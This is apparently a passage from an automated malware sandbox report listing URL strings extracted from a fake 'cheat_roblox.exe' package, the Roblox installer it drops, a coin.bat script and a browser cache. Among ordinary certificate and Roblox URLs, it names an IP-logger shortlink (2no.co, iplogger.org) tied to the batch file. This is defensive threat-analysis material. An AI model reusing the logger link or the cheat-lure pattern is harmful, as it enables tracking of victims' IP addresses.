            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AB31E000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AB31E000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AB31E000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AB31E000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1509281680.00000000047B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1517063706.00000000047B3000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509159312.00000000047AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508502616.00000000047A8000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508083550.00000000047C3000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.00000000047BE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508219364.0000000004796000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508619596.00000000025FB000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506523382.00000000025E2000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506523382.00000000025BE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507700641.00000000025FA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516457505.00000000025C0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516653504.00000000025FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507432352.000000000260D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516389477.00000000025AE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506475216.00000000025FF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510001432.00000000025AE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508922887.00000000025A0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506685606.000000000260C000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509200841.00000000025AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1509281680.00000000047B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1517063706.00000000047B3000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509159312.00000000047AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508502616.00000000047A8000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508083550.00000000047C3000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.00000000047BE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508219364.0000000004796000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
            Source: RobloxPlayerInstaller.exe, 00000004.00000002.1516741356.000000000260A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509001220.0000000002606000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508310105.0000000002602000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506475216.00000000025FF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508695693.0000000002605000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507432352.000000000260D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506475216.00000000025FF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506685606.000000000260C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
            Source: RobloxPlayerInstaller.exe, 00000004.00000002.1516741356.000000000260A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509001220.0000000002606000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508310105.0000000002602000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506475216.00000000025FF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508695693.0000000002605000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507432352.000000000260D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506475216.00000000025FF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506685606.000000000260C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1509730298.000000000255A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510324009.000000000256B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509773967.0000000002568000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516235530.000000000256B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506523382.00000000025E2000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507700641.00000000025FA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507934077.00000000025FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AB31E000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AB31E000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AB31E000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: RobloxPlayerInstaller.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AB31E000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506659428.0000000002623000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506808610.0000000002628000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506475216.00000000025FF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506725819.0000000002625000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516791173.000000000262D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507963440.000000000262D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AB31E000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: http://ocsp.digicert.com0
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AB31E000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AB31E000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AB31E000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: http://ocsp.digicert.com0X
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507432352.000000000260D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516389477.00000000025AE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506475216.00000000025FF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510001432.00000000025AE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508922887.00000000025A0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506685606.000000000260C000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509200841.00000000025AA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508164365.000000000260F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: http://tools.medialab.sciences-po.fr/iwanthue/index.php
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506659428.0000000002623000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506808610.0000000002628000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506475216.00000000025FF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506725819.0000000002625000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516791173.000000000262D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507963440.000000000262D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507432352.000000000260D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506475216.00000000025FF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506685606.000000000260C000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508164365.000000000260F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
            Source: RobloxPlayerInstaller.exe, 00000004.00000002.1516960770.0000000004790000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
            Source: RobloxPlayerInstaller.exe, 00000004.00000002.1516960770.0000000004790000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1509281680.00000000047B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1517091060.00000000047B6000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509159312.00000000047AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509602105.00000000047B5000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508502616.00000000047A8000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508219364.0000000004796000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AB31E000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
            Source: RobloxPlayerInstaller.exe, 00000004.00000002.1517423133.00000000047EF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508725092.00000000047A2000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507185996.00000000047E0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.00000000047BE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510424442.00000000047EF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507823321.00000000047EE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508219364.0000000004796000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508619596.00000000025FB000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506523382.00000000025E2000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507700641.00000000025FA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516653504.00000000025FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506523382.00000000025E2000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516688620.00000000025FD000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507700641.00000000025FA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507934077.00000000025FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1509730298.000000000255A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510324009.000000000256B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509773967.0000000002568000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516235530.000000000256B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.roblox.com
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1509730298.000000000255A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510324009.000000000256B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509773967.0000000002568000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516235530.000000000256B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.roblox.com/
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: http://www.winimage.com/zLibDll
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: http://www.winimage.com/zLibDll1.2.11rbr
            Source: chromecache_71.10.drString found in binary or memory: https://2no.co/
            Source: coin.bat.0.drString found in binary or memory: https://2no.co/24RXx6
            Source: chromecache_71.10.drString found in binary or memory: https://2no.co/redirect-2
            Source: chromecache_71.10.drString found in binary or memory: https://cdn.iplogger.org/favicon.ico
            Source: chromecache_71.10.drString found in binary or memory: https://cdn.iplogger.org/redirect/brand.png
            Source: chromecache_71.10.drString found in binary or memory: https://cdn.iplogger.org/redirect/handshake.png
            Source: chromecache_71.10.drString found in binary or memory: https://cdn.iplogger.org/redirect/logo-dark.png
            Source: RobloxPlayerInstaller.exe, 00000004.00000002.1516235530.000000000256B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller_9F112.log.4.dr, RobloxPlayerInstaller.exe.0.drString found in binary or memory: https://client-telemetry.roblox.com
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: https://client-telemetry.roblox.comHttpPointsReporterUrlBootstrapperWebView2InstallationTelemetryHun
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1509730298.000000000255A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510324009.000000000256B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509773967.0000000002568000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516235530.000000000256B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://client-telemetry.roblox.comata
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1506844085.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510054438.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509329168.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1517573174.0000000004827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://client-telemetry.roblox.come
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1509730298.000000000255A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510324009.000000000256B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509773967.0000000002568000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516235530.000000000256B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://client-telemetry.roblox.cominatorey
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1506844085.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510054438.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509329168.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1517573174.0000000004827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://client-telemetry.roblox.comogs
            Source: RobloxPlayerInstaller_9F112.log.4.drString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayer
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1506844085.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510054438.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509329168.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1517573174.0000000004827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayer(
            Source: RobloxPlayerInstaller.exe, 00000004.00000002.1516990822.000000000479D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508776431.000000000479D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508219364.0000000004796000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayer0
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1506844085.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510054438.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509329168.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1517573174.0000000004827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerLMEMH
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1506844085.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510054438.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509329168.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1517573174.0000000004827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerP
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1506844085.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510054438.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509329168.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1517573174.0000000004827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerX
